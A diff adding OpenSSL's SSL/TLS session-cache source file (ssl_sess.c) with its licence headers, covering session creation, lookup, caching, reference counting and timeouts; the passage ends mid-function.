+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#include <stdio.h>
+#include <openssl/lhash.h>
+#include <openssl/rand.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include "ssl_locl.h"
+
+static void SSL_SESSION_list_remove(SSL_CTX *ctx, SSL_SESSION *s);
+static void SSL_SESSION_list_add(SSL_CTX *ctx, SSL_SESSION *s);
+static int remove_session_lock(SSL_CTX *ctx, SSL_SESSION *c, int lck);
+
+SSL_SESSION *SSL_get_session(const SSL *ssl)
+/* aka SSL_get0_session; gets 0 objects, just returns a copy of the pointer */
+{
+    return (ssl->session);
+}
+
+SSL_SESSION *SSL_get1_session(SSL *ssl)
+/* variant of SSL_get_session: caller really gets something */
+{
+    SSL_SESSION *sess;
+    /*
+     * Need to lock this all up rather than just use CRYPTO_add so that
+     * somebody doesn't free ssl->session between when we check it's non-null
+     * and when we up the reference count.
+     */
+    CRYPTO_w_lock(CRYPTO_LOCK_SSL_SESSION);
+    sess = ssl->session;
+    if (sess)
+        sess->references++;
+    CRYPTO_w_unlock(CRYPTO_LOCK_SSL_SESSION);
+    return (sess);
+}
+
+int SSL_SESSION_get_ex_new_index(long argl, void *argp,
+                                 CRYPTO_EX_new *new_func,
+                                 CRYPTO_EX_dup *dup_func,
+                                 CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_SSL_SESSION, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int SSL_SESSION_set_ex_data(SSL_SESSION *s, int idx, void *arg)
+{
+    return (CRYPTO_set_ex_data(&s->ex_data, idx, arg));
+}
+
+void *SSL_SESSION_get_ex_data(const SSL_SESSION *s, int idx)
+{
+    return (CRYPTO_get_ex_data(&s->ex_data, idx));
+}
+
+SSL_SESSION *SSL_SESSION_new(void)
+{
+    SSL_SESSION *ss;
+
+    ss = (SSL_SESSION *)OPENSSL_malloc(sizeof(SSL_SESSION));
+    if (ss == NULL) {
+        SSLerr(SSL_F_SSL_SESSION_NEW, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    memset(ss, 0, sizeof(SSL_SESSION));
+
+    ss->verify_result = 1;      /* avoid 0 (= X509_V_OK) just in case */
+    ss->references = 1;
+    ss->timeout = 60 * 5 + 4;   /* 5 minute timeout by default */
+    ss->time = (unsigned long)time(NULL);
+    ss->prev = NULL;
+    ss->next = NULL;
+    ss->compress_meth = 0;
+#ifndef OPENSSL_NO_TLSEXT
+    ss->tlsext_hostname = NULL;
+# ifndef OPENSSL_NO_EC
+    ss->tlsext_ecpointformatlist_length = 0;
+    ss->tlsext_ecpointformatlist = NULL;
+    ss->tlsext_ellipticcurvelist_length = 0;
+    ss->tlsext_ellipticcurvelist = NULL;
+# endif
+#endif
+    CRYPTO_new_ex_data(CRYPTO_EX_INDEX_SSL_SESSION, ss, &ss->ex_data);
+#ifndef OPENSSL_NO_PSK
+    ss->psk_identity_hint = NULL;
+    ss->psk_identity = NULL;
+#endif
+#ifndef OPENSSL_NO_SRP
+    ss->srp_username = NULL;
+#endif
+    return (ss);
+}
+
+const unsigned char *SSL_SESSION_get_id(const SSL_SESSION *s,
+                                        unsigned int *len)
+{
+    if (len)
+        *len = s->session_id_length;
+    return s->session_id;
+}
+
+unsigned int SSL_SESSION_get_compress_id(const SSL_SESSION *s)
+{
+    return s->compress_meth;
+}
+
+/*
+ * Even with SSLv2, we have 16 bytes (128 bits) of session ID space.
+ * SSLv3/TLSv1 has 32 bytes (256 bits). As such, filling the ID with random
+ * gunk repeatedly until we have no conflict is going to complete in one
+ * iteration pretty much "most" of the time (btw: understatement). So, if it
+ * takes us 10 iterations and we still can't avoid a conflict - well that's a
+ * reasonable point to call it quits. Either the RAND code is broken or
+ * someone is trying to open roughly very close to 2^128 (or 2^256) SSL
+ * sessions to our server. How you might store that many sessions is perhaps
+ * a more interesting question ...
+ */
+
+#define MAX_SESS_ID_ATTEMPTS 10
+static int def_generate_session_id(const SSL *ssl, unsigned char *id,
+                                   unsigned int *id_len)
+{
+    unsigned int retry = 0;
+    do
+        if (RAND_pseudo_bytes(id, *id_len) <= 0)
+            return 0;
+    while (SSL_has_matching_session_id(ssl, id, *id_len) &&
+           (++retry < MAX_SESS_ID_ATTEMPTS)) ;
+    if (retry < MAX_SESS_ID_ATTEMPTS)
+        return 1;
+    /* else - woops a session_id match */
+    /*
+     * XXX We should also check the external cache -- but the probability of
+     * a collision is negligible, and we could not prevent the concurrent
+     * creation of sessions with identical IDs since we currently don't have
+     * means to atomically check whether a session ID already exists and make
+     * a reservation for it if it does not (this problem applies to the
+     * internal cache as well).
+     */
+    return 0;
+}
+
+int ssl_get_new_session(SSL *s, int session)
+{
+    /* This gets used by clients and servers. */
+
+    unsigned int tmp;
+    SSL_SESSION *ss = NULL;
+    GEN_SESSION_CB cb = def_generate_session_id;
+
+    if ((ss = SSL_SESSION_new()) == NULL)
+        return (0);
+
+    /* If the context has a default timeout, use it */
+    if (s->session_ctx->session_timeout == 0)
+        ss->timeout = SSL_get_default_timeout(s);
+    else
+        ss->timeout = s->session_ctx->session_timeout;
+
+    if (s->session != NULL) {
+        SSL_SESSION_free(s->session);
+        s->session = NULL;
+    }
+
+    if (session) {
+        if (s->version == SSL2_VERSION) {
+            ss->ssl_version = SSL2_VERSION;
+            ss->session_id_length = SSL2_SSL_SESSION_ID_LENGTH;
+        } else if (s->version == SSL3_VERSION) {
+            ss->ssl_version = SSL3_VERSION;
+            ss->session_id_length = SSL3_SSL_SESSION_ID_LENGTH;
+        } else if (s->version == TLS1_VERSION) {
+            ss->ssl_version = TLS1_VERSION;
+            ss->session_id_length = SSL3_SSL_SESSION_ID_LENGTH;
+        } else if (s->version == TLS1_1_VERSION) {
+            ss->ssl_version = TLS1_1_VERSION;
+            ss->session_id_length = SSL3_SSL_SESSION_ID_LENGTH;
+        } else if (s->version == TLS1_2_VERSION) {
+            ss->ssl_version = TLS1_2_VERSION;
+            ss->session_id_length = SSL3_SSL_SESSION_ID_LENGTH;
+        } else if (s->version == DTLS1_BAD_VER) {
+            ss->ssl_version = DTLS1_BAD_VER;
+            ss->session_id_length = SSL3_SSL_SESSION_ID_LENGTH;
+        } else if (s->version == DTLS1_VERSION) {
+            ss->ssl_version = DTLS1_VERSION;
+            ss->session_id_length = SSL3_SSL_SESSION_ID_LENGTH;
+        } else if (s->version == DTLS1_2_VERSION) {
+            ss->ssl_version = DTLS1_2_VERSION;
+            ss->session_id_length = SSL3_SSL_SESSION_ID_LENGTH;
+        } else {
+            SSLerr(SSL_F_SSL_GET_NEW_SESSION, SSL_R_UNSUPPORTED_SSL_VERSION);
+            SSL_SESSION_free(ss);
+            return (0);
+        }
+#ifndef OPENSSL_NO_TLSEXT
+        /*-
+         * If RFC5077 ticket, use empty session ID (as server).
+         * Note that:
+         * (a) ssl_get_prev_session() does lookahead into the
+         *     ClientHello extensions to find the session ticket.
+         *     When ssl_get_prev_session() fails, s3_srvr.c calls
+         *     ssl_get_new_session() in ssl3_get_client_hello().
+         *     At that point, it has not yet parsed the extensions,
+         *     however, because of the lookahead, it already knows
+         *     whether a ticket is expected or not.
+         *
+         * (b) s3_clnt.c calls ssl_get_new_session() before parsing
+         *     ServerHello extensions, and before recording the session
+         *     ID received from the server, so this block is a noop.
+         */
+        if (s->tlsext_ticket_expected) {
+            ss->session_id_length = 0;
+            goto sess_id_done;
+        }
+#endif
+        /* Choose which callback will set the session ID */
+        CRYPTO_r_lock(CRYPTO_LOCK_SSL_CTX);
+        if (s->generate_session_id)
+            cb = s->generate_session_id;
+        else if (s->session_ctx->generate_session_id)
+            cb = s->session_ctx->generate_session_id;
+        CRYPTO_r_unlock(CRYPTO_LOCK_SSL_CTX);
+        /* Choose a session ID */
+        tmp = ss->session_id_length;
+        if (!cb(s, ss->session_id, &tmp)) {
+            /* The callback failed */
+            SSLerr(SSL_F_SSL_GET_NEW_SESSION,
+                   SSL_R_SSL_SESSION_ID_CALLBACK_FAILED);
+            SSL_SESSION_free(ss);
+            return (0);
+        }
+        /*
+         * Don't allow the callback to set the session length to zero. nor
+         * set it higher than it was.
+         */
+        if (!tmp || (tmp > ss->session_id_length)) {
+            /* The callback set an illegal length */
+            SSLerr(SSL_F_SSL_GET_NEW_SESSION,
+                   SSL_R_SSL_SESSION_ID_HAS_BAD_LENGTH);
+            SSL_SESSION_free(ss);
+            return (0);
+        }
+        /* If the session length was shrunk and we're SSLv2, pad it */
+        if ((tmp < ss->session_id_length) && (s->version == SSL2_VERSION))
+            memset(ss->session_id + tmp, 0, ss->session_id_length - tmp);
+        else
+            ss->session_id_length = tmp;
+        /* Finally, check for a conflict */
+        if (SSL_has_matching_session_id(s, ss->session_id,
+                                        ss->session_id_length)) {
+            SSLerr(SSL_F_SSL_GET_NEW_SESSION, SSL_R_SSL_SESSION_ID_CONFLICT);
+            SSL_SESSION_free(ss);
+            return (0);
+        }
+#ifndef OPENSSL_NO_TLSEXT
+ sess_id_done:
+        if (s->tlsext_hostname) {
+            ss->tlsext_hostname = BUF_strdup(s->tlsext_hostname);
+            if (ss->tlsext_hostname == NULL) {
+                SSLerr(SSL_F_SSL_GET_NEW_SESSION, ERR_R_INTERNAL_ERROR);
+                SSL_SESSION_free(ss);
+                return 0;
+            }
+        }
+#endif
+    } else {
+        ss->session_id_length = 0;
+    }
+
+    if (s->sid_ctx_length > sizeof ss->sid_ctx) {
+        SSLerr(SSL_F_SSL_GET_NEW_SESSION, ERR_R_INTERNAL_ERROR);
+        SSL_SESSION_free(ss);
+        return 0;
+    }
+    memcpy(ss->sid_ctx, s->sid_ctx, s->sid_ctx_length);
+    ss->sid_ctx_length = s->sid_ctx_length;
+    s->session = ss;
+    ss->ssl_version = s->version;
+    ss->verify_result = X509_V_OK;
+
+    return (1);
+}
+
+/*-
+ * ssl_get_prev attempts to find an SSL_SESSION to be used to resume this
+ * connection. It is only called by servers.
+ *
+ *   session_id: points at the session ID in the ClientHello. This code will
+ *       read past the end of this in order to parse out the session ticket
+ *       extension, if any.
+ *   len: the length of the session ID.
+ *   limit: a pointer to the first byte after the ClientHello.
+ *
+ * Returns:
+ *   -1: error
+ *    0: a session may have been found.
+ *
+ * Side effects:
+ *   - If a session is found then s->session is pointed at it (after freeing an
+ *     existing session if need be) and s->verify_result is set from the session.
+ *   - Both for new and resumed sessions, s->tlsext_ticket_expected is set to 1
+ *     if the server should issue a new session ticket (to 0 otherwise).
+ */
+int ssl_get_prev_session(SSL *s, unsigned char *session_id, int len,
+                         const unsigned char *limit)
+{
+    /* This is used only by servers. */
+
+    SSL_SESSION *ret = NULL;
+    int fatal = 0;
+    int try_session_cache = 1;
+#ifndef OPENSSL_NO_TLSEXT
+    int r;
+#endif
+
+    if (len > SSL_MAX_SSL_SESSION_ID_LENGTH)
+        goto err;
+
+    if (len == 0)
+        try_session_cache = 0;
+
+#ifndef OPENSSL_NO_TLSEXT
+    /* sets s->tlsext_ticket_expected */
+    r = tls1_process_ticket(s, session_id, len, limit, &ret);
+    switch (r) {
+    case -1:                   /* Error during processing */
+        fatal = 1;
+        goto err;
+    case 0:                    /* No ticket found */
+    case 1:                    /* Zero length ticket found */
+        break;                  /* Ok to carry on processing session id. */
+    case 2:                    /* Ticket found but not decrypted. */
+    case 3:                    /* Ticket decrypted, *ret has been set. */
+        try_session_cache = 0;
+        break;
+    default:
+        abort();
+    }
+#endif
+
+    if (try_session_cache &&
+        ret == NULL &&
+        !(s->session_ctx->session_cache_mode &
+          SSL_SESS_CACHE_NO_INTERNAL_LOOKUP)) {
+        SSL_SESSION data;
+        data.ssl_version = s->version;
+        data.session_id_length = len;
+        if (len == 0)
+            return 0;
+        memcpy(data.session_id, session_id, len);
+        CRYPTO_r_lock(CRYPTO_LOCK_SSL_CTX);
+        ret = lh_SSL_SESSION_retrieve(s->session_ctx->sessions, &data);
+        if (ret != NULL) {
+            /* don't allow other threads to steal it: */
+            CRYPTO_add(&ret->references, 1, CRYPTO_LOCK_SSL_SESSION);
+        }
+        CRYPTO_r_unlock(CRYPTO_LOCK_SSL_CTX);
+        if (ret == NULL)
+            s->session_ctx->stats.sess_miss++;
+    }
+
+    if (try_session_cache &&
+        ret == NULL && s->session_ctx->get_session_cb != NULL) {
+        int copy = 1;
+
+        if ((ret = s->session_ctx->get_session_cb(s, session_id, len, &copy))) {
+            s->session_ctx->stats.sess_cb_hit++;
+
+            /*
+             * Increment reference count now if the session callback asks us
+             * to do so (note that if the session structures returned by the
+             * callback are shared between threads, it must handle the
+             * reference count itself [i.e. copy == 0], or things won't be
+             * thread-safe).
+             */
+            if (copy)
+                CRYPTO_add(&ret->references, 1, CRYPTO_LOCK_SSL_SESSION);
+
+            /*
+             * Add the externally cached session to the internal cache as
+             * well if and only if we are supposed to.
+             */
+            if (!
+                (s->session_ctx->session_cache_mode &
+                 SSL_SESS_CACHE_NO_INTERNAL_STORE))
+                /*
+                 * The following should not return 1, otherwise, things are
+                 * very strange
+                 */
+                SSL_CTX_add_session(s->session_ctx, ret);
+        }
+    }
+
+    if (ret == NULL)
+        goto err;
+
+    /* Now ret is non-NULL and we own one of its reference counts. */
+
+    if (ret->sid_ctx_length != s->sid_ctx_length
+        || memcmp(ret->sid_ctx, s->sid_ctx, ret->sid_ctx_length)) {
+        /*
+         * We have the session requested by the client, but we don't want to
+         * use it in this context.
+         */
+        goto err;               /* treat like cache miss */
+    }
+
+    if ((s->verify_mode & SSL_VERIFY_PEER) && s->sid_ctx_length == 0) {
+        /*
+         * We can't be sure if this session is being used out of context,
+         * which is especially important for SSL_VERIFY_PEER. The application
+         * should have used SSL[_CTX]_set_session_id_context. For this error
+         * case, we generate an error instead of treating the event like a
+         * cache miss (otherwise it would be easy for applications to
+         * effectively disable the session cache by accident without anyone
+         * noticing).
+         */
+
+        SSLerr(SSL_F_SSL_GET_PREV_SESSION,
+               SSL_R_SESSION_ID_CONTEXT_UNINITIALIZED);
+        fatal = 1;
+        goto err;
+    }
+
+    if (ret->cipher == NULL) {
+        unsigned char buf[5], *p;
+        unsigned long l;
+
+        p = buf;
+        l = ret->cipher_id;
+        l2n(l, p);
+        if ((ret->ssl_version >> 8) >= SSL3_VERSION_MAJOR)
+            ret->cipher = ssl_get_cipher_by_char(s, &(buf[2]));
+        else
+            ret->cipher = ssl_get_cipher_by_char(s, &(buf[1]));
+        if (ret->cipher == NULL)
+            goto err;
+    }
+
+    if (ret->timeout < (long)(time(NULL) - ret->time)) { /* timeout */
+        s->session_ctx->stats.sess_timeout++;
+        if (try_session_cache) {
+            /* session was from the cache, so remove it */
+            SSL_CTX_remove_session(s->session_ctx, ret);
+        }
+        goto err;
+    }
+
+    s->session_ctx->stats.sess_hit++;
+
+    if (s->session != NULL)
+        SSL_SESSION_free(s->session);
+    s->session = ret;
+    s->verify_result = s->session->verify_result;
+    return 1;
+
+ err:
+    if (ret != NULL) {
+        SSL_SESSION_free(ret);
+#ifndef OPENSSL_NO_TLSEXT
+        if (!try_session_cache) {
+            /*
+             * The session was from a ticket, so we should issue a ticket for
+             * the new session
+             */
+            s->tlsext_ticket_expected = 1;
+        }
+#endif
+    }
+    if (fatal)
+        return -1;
+    else
+        return 0;
+}
+
+int SSL_CTX_add_session(SSL_CTX *ctx, SSL_SESSION *c)
+{
+    int ret = 0;
+    SSL_SESSION *s;
+
+    /*
+     * add just 1 reference count for the SSL_CTX's session cache even though
+     * it has two ways of access: each session is in a doubly linked list and
+     * an lhash
+     */
+    CRYPTO_add(&c->references, 1, CRYPTO_LOCK_SSL_SESSION);
+    /*
+     * if session c is in already in cache, we take back the increment later
+     */
+
+    CRYPTO_w_lock(CRYPTO_LOCK_SSL_CTX);
+    s = lh_SSL_SESSION_insert(ctx->sessions, c);
+
+    /*
+     * s != NULL iff we already had a session with the given PID. In this
+     * case, s == c should hold (then we did not really modify
+     * ctx->sessions), or we're in trouble.
+     */
+    if (s != NULL && s != c) {
+        /* We *are* in trouble ... */
+        SSL_SESSION_list_remove(ctx, s);
+        SSL_SESSION_free(s);
+        /*
+         * ... so pretend the other session did not exist in cache (we cannot
+         * handle two SSL_SESSION structures with identical session ID in the
+         * same cache, which could happen e.g. when two threads concurrently
+         * obtain the same session from an external cache)
+         */
+        s = NULL;
+    }
+
+    /* Put at the head of the queue unless it is already in the cache */
+    if (s == NULL)
+        SSL_SESSION_list_add(ctx, c);
+
+    if (s != NULL) {
+        /*
+         * existing cache entry -- decrement previously incremented reference
+         * count because it already takes into account the cache
+         */
+
+        SSL_SESSION_free(s);    /* s == c */
+        ret = 0;
+    } else {
+        /*
+         * new cache entry -- remove old ones if cache has become too large
+         */
+
+        ret = 1;
+
+        if (SSL_CTX_sess_get_cache_size(ctx) > 0) {
+            while (SSL_CTX_sess_number(ctx) >
+                   SSL_CTX_sess_get_cache_size(ctx)) {
+                if (!remove_session_lock(ctx, ctx->session_cache_tail, 0))
+                    break;
+                else
+                    ctx->stats.sess_cache_full++;
+            }
+        }
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_SSL_CTX);
+    return (ret);
+}
+
+int SSL_CTX_remove_session(SSL_CTX *ctx, SSL_SESSION *c)
+{
+    return remove_session_lock(ctx, c, 1);
+}
+
+static int remove_session_lock(SSL_CTX *ctx, SSL_SESSION *c, int lck)
+{
+    SSL_SESSION *r;
+    int ret = 0;
+
+    if ((c != NULL) && (c->session_id_length != 0)) {
+        if (lck)
+            CRYPTO_w_lock(CRYPTO_LOCK_SSL_CTX);
+        if ((r = lh_SSL_SESSION_retrieve(ctx->sessions, c)) == c) {
+            ret = 1;
+            r = lh_SSL_SESSION_delete(ctx->sessions, c);
+            SSL_SESSION_list_remove(ctx, c);
+        }
+
+        if (lck)
+            CRYPTO_w_unlock(CRYPTO_LOCK_SSL_CTX);
+
+        if (ret) {
+            r->not_resumable = 1;
+            if (ctx->remove_session_cb != NULL)
+                ctx->remove_session_cb(ctx, r);
+            SSL_SESSION_free(r);
+        }
+    } else
+        ret = 0;
+    return (ret);
+}
+
+void SSL_SESSION_free(SSL_SESSION *ss)
+{
+    int i;
+
+    if (ss == NULL)
+        return;
+
+    i = CRYPTO_add(&ss->references, -1, CRYPTO_LOCK_SSL_SESSION);
+#ifdef REF_PRINT
+    REF_PRINT("SSL_SESSION", ss);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "SSL_SESSION_free, bad reference count\n");
+        abort();                /* ok */
+    }
+#endif
+
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_SSL_SESSION, ss, &ss->ex_data);
+
+    OPENSSL_cleanse(ss->key_arg, sizeof ss->key_arg);
+    OPENSSL_cleanse(ss->master_key, sizeof ss->master_key);
+    OPENSSL_cleanse(ss->session_id, sizeof ss->session_id);
+    if (ss->sess_cert != NULL)
+        ssl_sess_cert_free(ss->sess_cert);
+    if (ss->peer != NULL)
+        X509_free(ss->peer);
+    if (ss->ciphers != NULL)
+        sk_SSL_CIPHER_free(ss->ciphers);
+#ifndef OPENSSL_NO_TLSEXT
+    if (ss->tlsext_hostname != NULL)
+        OPENSSL_free(ss->tlsext_hostname);
+    if (ss->tlsext_tick != NULL)
+        OPENSSL_free(ss->tlsext_tick);
+# ifndef OPENSSL_NO_EC
+    ss->tlsext_ecpointformatlist_length = 0;
+    if (ss->tlsext_ecpointformatlist != NULL)
+        OPENSSL_free(ss->tlsext_ecpointformatlist);
+    ss->tlsext_ellipticcurvelist_length = 0;
+    if (ss->tlsext_ellipticcurvelist != NULL)
+        OPENSSL_free(ss->tlsext_ellipticcurvelist);
+# endif                         /* OPENSSL_NO_EC */
+#endif
+#ifndef OPENSSL_NO_PSK
+    if (ss->psk_identity_hint != NULL)
+        OPENSSL_free(ss->psk_identity_hint);
+    if (ss->psk_identity != NULL)
+        OPENSSL_free(ss->psk_identity);
+#endif
+#ifndef OPENSSL_NO_SRP
+    if (ss->srp_username != NULL)
+        OPENSSL_free(ss->srp_username);
+#endif
+    OPENSSL_cleanse(ss, sizeof(*ss));
+    OPENSSL_free(ss);
+}
+
+int SSL_set_session(SSL *s, SSL_SESSION *session)
+{
+    int ret = 0;
+    const SSL_METHOD *meth;
+
+    if (session != NULL) {
+        meth = s->ctx->method->get_ssl_method(session->ssl_version);
+        if (meth == NULL)
+            meth = s->method->get_ssl_method(session->ssl_version);
+        if (meth == NULL) {
+            SSLerr(SSL_F_SSL_SET_SESSION, SSL_R_UNABLE_TO_FIND_SSL_METHOD);
+            return (0);
+        }
+
+        if (meth != s->method) {
+            if (!SSL_set_ssl_method(s, meth))
+                return (0);
+        }
+#ifndef OPENSSL_NO_KRB5
+        if (s->kssl_ctx && !s->kssl_ctx->client_princ &&
+            session->krb5_client_princ_len > 0) {
+            s->kssl_ctx->client_princ =
+                (char *)OPENSSL_malloc(session->krb5_client_princ_len + 1);
+            memcpy(s->kssl_ctx->client_princ, session->krb5_client_princ,
+                   session->krb5_client_princ_len);
+            s->kssl_ctx->client_princ[session->krb5_client_princ_len] = '\0';
+        }
+#endif                          /* OPENSSL_NO_KRB5 */
+
+        /* CRYPTO_w_lock(CRYPTO_LOCK_SSL); */
+        CRYPTO_add(&session->references, 1, CRYPTO_LOCK_SSL_SESSION);
+        if (s->session != NULL)
+            SSL_SESSION_free(s->session);
+        s->session = session;
+        s->verify_result = s->session->verify_result;
+        /* CRYPTO_w_unlock(CRYPTO_LOCK_SSL); */
+        ret = 1;
+    } else {
+        if (s->session != NULL) {
+            SSL_SESSION_free(s->session);
+            s->session = NULL;
+        }
+
+        meth = s->ctx->method;
+        if (meth != s->method) {
+            if (!SSL_set_ssl_method(s, meth))
+                return (0);
+        }
+        ret = 1;
+    }
+    return (ret);
+}
+
+long SSL_SESSION_set_timeout(SSL_SESSION *s, long t)
+{
+    if (s == NULL)
+        return (0);
+    s->timeout = t;
+    return (1);
+}
+
+long SSL_SESSION_get_timeout(const SSL_SESSION *s)
+{
+    if (s == NULL)
+        return (0);
+    return (s->timeout);
+}
+
+long SSL_SESSION_get_time(const SSL_SESSION *s)
+{
+    if (s == NULL)
+        return (0);
+    return (s->time);
+}
+
+long SSL_SESSION_set_time(SSL_SESSION *s, long t)
+{
+    if (s == NULL)
+        return (0);
+    s->time = t;
+    return (t);
+}
+
+X509 *SSL_SESSION_get0_peer(SSL_SESSION *s)
+{
+    return s->peer;
+}
+
+int SSL_SESSION_set1_id_context(SSL_SESSION *s, const unsigned char *sid_ctx,
+                                unsigned int sid_ctx_len)
+{
+    if (sid_ctx_len > SSL_MAX_SID_CTX_LENGTH) {
+        SSLerr(SSL_F_SSL_SESSION_SET1_ID_CONTEXT,
+               SSL_R_SSL_SESSION_ID_CONTEXT_TOO_LONG);
+        return 0;
+    }
+    s->sid_ctx_length = sid_ctx_len;
+    memcpy(s->sid_ctx, sid_ctx, sid_ctx_len);
+
+    return 1;
+}
+
+long SSL_CTX_set_timeout(SSL_CTX *s, long t)
+{
+    long l;
+    if (s == NULL)
+        return (0);
+    l = s->session_timeout;
+    s->session_timeout = t;
+    return (l);
+}
+
+long SSL_CTX_get_timeout(const SSL_CTX *s)
+{
+    if (s == NULL)
+        return (0);
+    return (s->session_timeout);
+}
+
+#ifndef OPENSSL_NO_TLSEXT
+int SSL_set_session_secret_cb(SSL *s,
+                              int (*tls_session_secret_cb) (SSL *s,
+                                                            void *secret,
+                                                            int *secret_len,
+                                                            STACK_OF(SSL_CIPHER)
+                                                            *peer_ciphers,
+                                                            SSL_CIPHER
+                                                            **cipher,
+                                                            void *arg),
+                              void *arg)
+{
+    if (s == NULL)
+        return (0);
+    s->tls_session_secret_cb = tls_session_secret_cb;
+    s->tls_session_secret_cb_arg = arg;
+    return (1);
+}
+
+int SSL_set_session_ticket_ext_cb(SSL *s, tls_session_ticket_ext_cb_fn cb,
+                                  void *arg)
+{
+    if (s == NULL)
+        return (0);
+    s->tls_session_ticket_ext_cb = cb;
+    s->tls_session_ticket_ext_cb_arg = arg;
